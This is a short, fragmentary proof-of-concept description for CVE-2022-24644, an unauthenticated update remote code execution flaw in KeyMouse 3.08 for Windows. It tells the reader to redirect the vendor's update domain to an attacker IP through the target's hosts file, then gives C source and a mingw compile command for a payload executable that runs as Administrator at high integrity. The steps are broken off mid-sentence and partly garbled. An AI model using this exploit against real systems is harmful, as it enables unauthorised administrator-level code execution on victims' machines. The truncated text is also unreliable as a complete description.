
ZZ Inc. KeyMouse 3.08 (Windows) Unauthenticated Update Remote Code Execution Vulnerability
Usage: python3 cve-2022-24644_poc.py
Details in the report at gerr.re.
www.keymouse.com to our attacker ip;
c:\windows\system32\drivers\etc\hosts on the target.
proof.c on the attacker, e.g. using i686-w64-mingw32-gcc proof.c -o proof.exe;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
As a result, proof.exe is executed in the context of the Administrator user at high integrity.